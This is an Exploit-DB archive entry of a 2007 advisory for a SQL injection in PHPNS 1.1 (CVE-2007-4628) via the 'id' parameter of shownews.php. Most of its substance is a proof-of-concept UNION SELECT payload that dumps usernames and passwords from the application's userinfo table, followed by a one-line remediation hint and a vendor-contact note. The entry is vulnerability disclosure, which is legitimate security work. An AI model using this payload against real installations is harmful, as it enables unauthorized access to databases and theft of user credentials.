PHPNS 1.1 - 'shownews.php?id' SQL Injection

EDB-ID:

4339

CVE:

2007-4628

EDB Verified:

Author:

SmOk3

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2007-08-29

Vulnerable App: 
PHPNS SQL Injection

Software: phpns current version (v1.1)
Vendor link: http://phpns.com
Attack: SQL Injection

Original advisory: http://14house.blogspot.com/2007/08/phpns-sql-injection.html

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable
system. This may compromise the integrity of your database and/or
expose sensitive information. Vulnerable variable is $nid and maybe
others.

Proof of Concept:
/phpns/shownews.php?id=1'[SQL Injection]

Shows username : pass from userinfo
/phpns/shownews.php?id=1' union select all
null,null,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),null,null,null
from userinfo/*


Solution:

Your script should filter metacharacters from user input.

Vendor:

Contacted and replyed that they are fixing it.

# milw0rm.com [2007-08-29]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services